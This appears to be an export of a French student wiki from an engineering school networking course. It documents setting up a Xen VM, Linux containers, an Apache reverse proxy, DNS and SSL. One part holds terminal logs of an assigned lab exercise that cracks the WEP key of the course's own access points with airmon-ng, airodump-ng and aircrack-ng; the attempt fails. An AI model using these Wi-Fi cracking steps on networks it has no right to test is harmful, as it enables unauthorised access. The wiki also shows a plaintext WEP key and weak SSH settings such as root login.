&lt;br /&gt;
root@zabeth17:/home/pifou# nping --arp-type ARP -c 11000  --flags rst --ttl 2 10.2.0.2&lt;br /&gt;
&lt;br /&gt;
Starting Nping 0.7.60 ( https://nmap.org/nping ) at 2017-12-12 15:13 GMT&lt;br /&gt;
SENT (0.0373s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (0.2238s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (1.0378s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (1.2438s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (2.0387s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (2.0638s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (3.0399s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (3.0839s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (4.0419s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (4.1078s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (5.0439s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
&lt;br /&gt;
root@zabeth17:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
# This file describes the network interfaces available on your system&lt;br /&gt;
# and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto wlx000fb5922374&lt;br /&gt;
iface wlx000fb5922374 inet static&lt;br /&gt;
 wireless-keymode open&lt;br /&gt;
 wireless-mode managed&lt;br /&gt;
 address 10.2.0.100&lt;br /&gt;
 netmask 255.255.0.0&lt;br /&gt;
 wireless-essid banane&lt;br /&gt;
 wireless-key 01234567891011121314151617&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
airmon-ng start wlx000fb5922374&lt;br /&gt;
root@zabeth17:/home/pifou# iwconfig&lt;br /&gt;
docker0   no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vmnet1    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vmnet8    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vethea48f02  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vethc680cf4  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
enp6s0    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
veth27a815a  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
veth3773236  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vethf9b8093  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
enp0s25   no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.447 GHz  Tx-Power=15 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          &lt;br /&gt;
bridge    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vethb5bee00  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
veth12b76b4  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth17:/home/pifou# airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
 CH  8 ][ Elapsed: 6 s ][ 2017-12-12 15:04                                         &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                        &lt;br /&gt;
 C4:14:3C:12:61:C2  -67       26        0    0   9  54e. WEP  WEP         BORNE_TEST3                   &lt;br /&gt;
 C4:14:3C:12:61:C1  -61       28        0    0   9  54e. WEP  WEP         BORNE_TEST2                   &lt;br /&gt;
 C4:14:3C:40:78:60  -70       21        0    0   3  54e. WEP  WEP         ananas                        &lt;br /&gt;
 C4:14:3C:40:78:63  -76       20        0    0   3  54e. WEP  WEP         goyave                         &lt;br /&gt;
 C4:14:3C:12:61:C4  -68       25        0    0   9  54e. WEP  WEP         BORNE_TEST5                   &lt;br /&gt;
 C4:14:3C:12:61:C0  -68       27        0    0   9  54e. WEP  WEP         BORNE_TEST1                   &lt;br /&gt;
 C4:14:3C:12:61:C3  -63       25        0    0   9  54e. WEP  WEP         BORNE_TEST4                   &lt;br /&gt;
 C4:14:3C:40:78:61  -73       16        0    0   3  54e. WEP  WEP         banane                        &lt;br /&gt;
 C4:14:3C:40:78:64  -68       14        0    0   3  54e. WEP  WEP         groseille                     &lt;br /&gt;
 C4:14:3C:40:78:65  -74       22        0    0   3  54e. WEP  WEP         reseau1                       &lt;br /&gt;
 C4:14:3C:12:61:C5  -59       24        0    0   9  54e. WEP  WEP         BORNE_TEST6                    &lt;br /&gt;
 C4:14:3C:40:78:62  -72       16        0    0   3  54e. WEP  WEP         durian                        &lt;br /&gt;
 C4:14:3C:40:78:67  -77       16        0    0   3  54e. WEP  WEP         tomate                        &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 (not associated)   AC:AF:B9:B0:DF:32  -75    0 - 1      0        1  PolytechLille                       &lt;br /&gt;
 (not associated)   B8:08:D7:16:6E:69  -73    0 - 1      0        1                                      &lt;br /&gt;
 (not associated)   60:F4:45:D0:DA:DB  -73    0 - 1      0        2  PolytechLille  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
pifou@zabeth15:~$ su&lt;br /&gt;
Password: &lt;br /&gt;
root@zabeth15:/home/pifou# iwconfig&lt;br /&gt;
vethbecbb63  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
enp0s25   no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
enp6s0    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
docker0   no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vmnet1    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
bridge    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vmnet8    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wlx000fb5922266  IEEE 802.11  ESSID:off/any  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=0 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:off&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# airmon-ng start wlx000fb5922266&lt;br /&gt;
&lt;br /&gt;
Found 3 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to run 'airmon-ng check kill'&lt;br /&gt;
&lt;br /&gt;
  PID Name&lt;br /&gt;
 1695 dhclient&lt;br /&gt;
 2949 avahi-daemon&lt;br /&gt;
 2950 avahi-daemon&lt;br /&gt;
&lt;br /&gt;
PHY	Interface	Driver		Chipset&lt;br /&gt;
&lt;br /&gt;
phy0	wlx000fb5922266	p54usb		NetGear, Inc. WG111(v1) rev 2 54 Mbps Wireless [Intersil ISL3887]&lt;br /&gt;
Interface 15mon is too long for linux so it will be renamed to the old style (wlan#) name.&lt;br /&gt;
&lt;br /&gt;
		(mac80211 monitor mode vif enabled on [phy0]wlan0mon&lt;br /&gt;
		(mac80211 station mode vif disabled for [phy0]wlx000fb5922266)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# airodump-ng --bssid C4:14:3C:40:78:61 -c 3 -w crack_wep_ungdelatte wlan0mon&lt;br /&gt;
&lt;br /&gt;
# -c 3 précise que le réseau est sur le channel 3.&lt;br /&gt;
# -w crack_wep_ungdelatte est le fichier qui va stocker les paquets capturés.&lt;br /&gt;
&lt;br /&gt;
 CH  3 ][ Elapsed: 20 mins ][ 2017-12-12 15:18                     &lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  C&lt;br /&gt;
                                                                   &lt;br /&gt;
 C4:14:3C:40:78:61  -64   8    11488        0    0   3  54e. WEP  W&lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# aircrack-ng crack_wep_ungdelatte-01.cap&lt;br /&gt;
Opening crack_wep_ungdelatte-01.cap&lt;br /&gt;
Read 12494 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
&lt;br /&gt;
   1  C4:14:3C:40:78:61  banane                    No data - WEP or WPA&lt;br /&gt;
&lt;br /&gt;
Choosing first network as target.&lt;br /&gt;
&lt;br /&gt;
Opening crack_wep_ungdelatte-01.cap&lt;br /&gt;
Got no data packets from target network!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# airodump-ng --bssid C4:14:3C:40:78:61 -c 3 -w crack_wep_ungdelatte wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 CH  3 ][ Elapsed: 28 mins ][ 2017-12-12 16:03                     &lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  C&lt;br /&gt;
                                                                   &lt;br /&gt;
 C4:14:3C:40:78:61  -64   0    16423        0    0   3  54e. WEP  W&lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames&lt;br /&gt;
                                                                   &lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# ls&lt;br /&gt;
3D				       Documents&lt;br /&gt;
Arduino				       Downloads&lt;br /&gt;
crack_wep_ungdelatte-01.cap	       GIS4_Bernard_Castelein&lt;br /&gt;
crack_wep_ungdelatte-01.csv	       IMA5sc-ASR&lt;br /&gt;
crack_wep_ungdelatte-01.kismet.csv     Music&lt;br /&gt;
crack_wep_ungdelatte-01.kismet.netxml  Pictures&lt;br /&gt;
crack_wep_ungdelatte-02.cap	       Public&lt;br /&gt;
crack_wep_ungdelatte-02.csv	       R&lt;br /&gt;
crack_wep_ungdelatte-02.kismet.csv     replay_arp-1212-153701.cap&lt;br /&gt;
crack_wep_ungdelatte-02.kismet.netxml  Templates&lt;br /&gt;
Desktop				       Videos&lt;br /&gt;
root@zabeth15:/home/pifou# aircrack-ng crack_wep_ungdelatte-02.cap&lt;br /&gt;
Opening crack_wep_ungdelatte-02.cap&lt;br /&gt;
Read 13001 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
&lt;br /&gt;
   1  C4:14:3C:40:78:61  banane                    No data - WEP or WPA&lt;br /&gt;
&lt;br /&gt;
Choosing first network as target.&lt;br /&gt;
&lt;br /&gt;
Opening crack_wep_ungdelatte-02.cap&lt;br /&gt;
Got no data packets from target network!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau et création de conteneurs sous Machine Virtuelle Linux&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On se propose dans cette partie de réaliser la création et la mise en réseau de conteneurs sous Linux.&lt;br /&gt;
&lt;br /&gt;
Après avoir créé un système de fichiers avec debootstrap puis une machine virtuelle (IMA5-BANANE en l'occurence) sur le serveur de virtualisation Cordouan, on crée trois conteneurs C1, C2 et C3 distincts au sein celle-ci.&lt;br /&gt;
&lt;br /&gt;
Connecter les conteneurs en réseau :&lt;br /&gt;
&lt;br /&gt;
    créer une double interface Ethernet virtuelle ;&lt;br /&gt;
    sur l’hôte ajouter l’interface dans un pont virtuel ;&lt;br /&gt;
    envoyer le pair dans l’espace réseau du conteneur ;&lt;br /&gt;
    configurer l’adresse IP sur l’interface du conteneur ...&lt;br /&gt;
    ... il peut être nécessaire d’utiliser nsenter. &lt;br /&gt;
&lt;br /&gt;
Pour la création d'un conteneur, on utilise la commande unshare couplée à des options et à une fonction serverx.sh qui ne fait que repeter une fonction sleep 5 en boucle. Elle permet de lancer séparément une commande (ici /bin/serverx.sh) en définissant un root différent.&lt;br /&gt;
&lt;br /&gt;
    unshare -n -u -m -p -f chroot ./chroot /bin/serverx.sh&lt;br /&gt;
&lt;br /&gt;
Si on veut entrer dans le conteneur après en être sorti, on utilise la commande:&lt;br /&gt;
&lt;br /&gt;
    nsenter -n -u -m -p -t &amp;lt;PID&amp;gt; chroot ./chroot /bin/bash&lt;br /&gt;
&lt;br /&gt;
On ajoute alors toutes nos interfaces virtuelles eth0@vifX de type veth. Les Ponts &amp;quot;monpont&amp;quot; et &amp;quot;carrefour&amp;quot; ont déjà été définis dans /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
    ip link add vif1 type veth peer name eth0@vif1&lt;br /&gt;
    ip link add vif2 type veth peer name eth0@vif2&lt;br /&gt;
    ip link add vif3 type veth peer name eth0@vif3&lt;br /&gt;
    ip link add vif4 type veth peer name eth0@vif4&lt;br /&gt;
&lt;br /&gt;
On ajoute les vifx aux ponts correspondants&lt;br /&gt;
&lt;br /&gt;
    ip link set vif1 master monpont&lt;br /&gt;
    ip link set vif2 master carrefour &lt;br /&gt;
    ip link set vif3 master carrefour&lt;br /&gt;
    ip link set vif4 master carrefour&lt;br /&gt;
 &lt;br /&gt;
On peut vérifier la création à chaque commande grâce aux la commande:&lt;br /&gt;
&lt;br /&gt;
    ip l show et brctl show&lt;br /&gt;
&lt;br /&gt;
L'adresse ip de &amp;quot;monpont&amp;quot; est défini dans le fichier interfaces avec l'adresse 193.48.57.179 et est connecté au réseau via eth0&lt;br /&gt;
Nous avons choisis le reseau local entre les conteneur sur la plage 192.168.0.0/24. L'adresse de &amp;quot;carrefour&amp;quot; est 192.168.0.1.&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif1 (renommée eth0) comme étant l'interface entre le reverse proxy et &amp;quot;monpont&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
    ip link set eth0@vif1 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif2 (renommée eth1) comme étant l'interface entre le reverse proxy et les carrefour.&lt;br /&gt;
&lt;br /&gt;
    ip link set eth0@vif2 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif3 et eth0@vif4 (renommées eth0) comme étant les interfaces respectives entre le server1, serveur 2 et le pont carrefour.&lt;br /&gt;
&lt;br /&gt;
    ip link set eth0@vif3 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
    ip link set eth0@vif4 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur &amp;quot;chroot&amp;quot;, on ajoute alors l'adresse IP 193.48.57.189/28 à eth0 et on active eth0, vif1 et &amp;quot;monpont&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
    ip addr add 193.48.57.189/28 dev eth0&lt;br /&gt;
    ip link set dev eth0 up&lt;br /&gt;
    ip link set vif1 up&lt;br /&gt;
    ip link set dev monpont up&lt;br /&gt;
&lt;br /&gt;
Dans le conteneurs serverX et dans le reverse proxy, on ajoute alors les adresse IP 192.168.0.100/24 et 192.168.0.200/24 et 192.168.0.150/24 aux eth0 respectifs puis on active vif2 vif3 vif4 et &amp;quot;carrefour&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Le réseau étant fonctionnel nous pouvons nous attaquer à la configuration des serveur apache2.&lt;br /&gt;
&lt;br /&gt;
Nous avons donc installé un serveur apache2 dans chaque conteneur.&lt;br /&gt;
&lt;br /&gt;
Pour ce qui est du serveur apache qui jouera le rôle de reverse proxy le fichier de configuration se trouvant dans /etc/apache2/sites-available sera configuré de la manière suivante:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ServerName 193.48.57.189:80&lt;br /&gt;
 VirtualHost 193.48.57.189:80&lt;br /&gt;
	 ServerName reverse.banane.space&lt;br /&gt;
	 DocumentRoot /var/www/html&lt;br /&gt;
&lt;br /&gt;
	 ProxyPass / http://192.168.0.100:631&lt;br /&gt;
    	 ProxyPassReverse / http://192.168.0.100:631&lt;br /&gt;
    	 ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
	 LogFormat &amp;quot;%h %l %u %t \&amp;quot;%r\&amp;quot; %&amp;gt;s %b&amp;quot; common&lt;br /&gt;
	 CustomLog logs/access_log common&lt;br /&gt;
 VirtualHost&lt;br /&gt;
&lt;br /&gt;
On retrouve l'adresse du serveur apache qui correspond à celle du conteneur relié au réseau 192.48.57.189.&lt;br /&gt;
&lt;br /&gt;
On redirigera les requêtes via le port 631 (TCP/UDP) toutefois il est tout à fais possible de le faire circuler sur le port 80 car les serveurs se trouvent normalement dans des conteneurs.&lt;br /&gt;
&lt;br /&gt;
Au niveau de '''server1'''(équivalent pour server2) j'ai seulement cré un serveur apache2 sous cette forme:&lt;br /&gt;
&lt;br /&gt;
 ServerName 192.168.0.100:631&lt;br /&gt;
 &amp;lt;VirtualHost 192.168.0.100:631&amp;gt;&lt;br /&gt;
	 ServerName site1.banane.space&lt;br /&gt;
	 DocumentRoot /var/www/html&lt;br /&gt;
&lt;br /&gt;
	 LogFormat &amp;quot;%h %l %u %t \&amp;quot;%r\&amp;quot; %&amp;gt;s %b&amp;quot; common&lt;br /&gt;
	 CustomLog logs/access_log common&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
il peut être nécessaire de demander dans ports.conf d'écouter le port 631.&lt;br /&gt;
&lt;br /&gt;
Dans le dns db.banane.space nous avons rajouter les différentes adresses:&lt;br /&gt;
&lt;br /&gt;
 reverse	IN	A	193.48.57.189&lt;br /&gt;
 site1	        IN	A	193.48.57.189&lt;br /&gt;
 site2	        IN	A	193.48.57.189&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46618</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46618"/>
				<updated>2017-12-13T14:14:48Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
       ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
       xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
       xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:IMA5-BANANE.png]]&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
       xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
       xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement: &lt;br /&gt;
&lt;br /&gt;
    ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
    xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
    ssh username@weppes&lt;br /&gt;
    ssh root@193.48.57.179&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
    RSAAuthentication yes&lt;br /&gt;
    PubkeyAuthentication yes&lt;br /&gt;
    #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
    PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
    root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
Nous commencons par acheter un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
    Generating a 2048 bit RSA private key&lt;br /&gt;
    If you enter '.', the field will be left blank.&lt;br /&gt;
    -----&lt;br /&gt;
    Country Name (2 letter code) [AU]:FR&lt;br /&gt;
    State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
    Locality Name (eg, city) []:Lille&lt;br /&gt;
    Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
    Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
    Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
    Email Address []:&lt;br /&gt;
    A challenge password []:&lt;br /&gt;
    An optional company name []:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
    -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
    &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
    -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
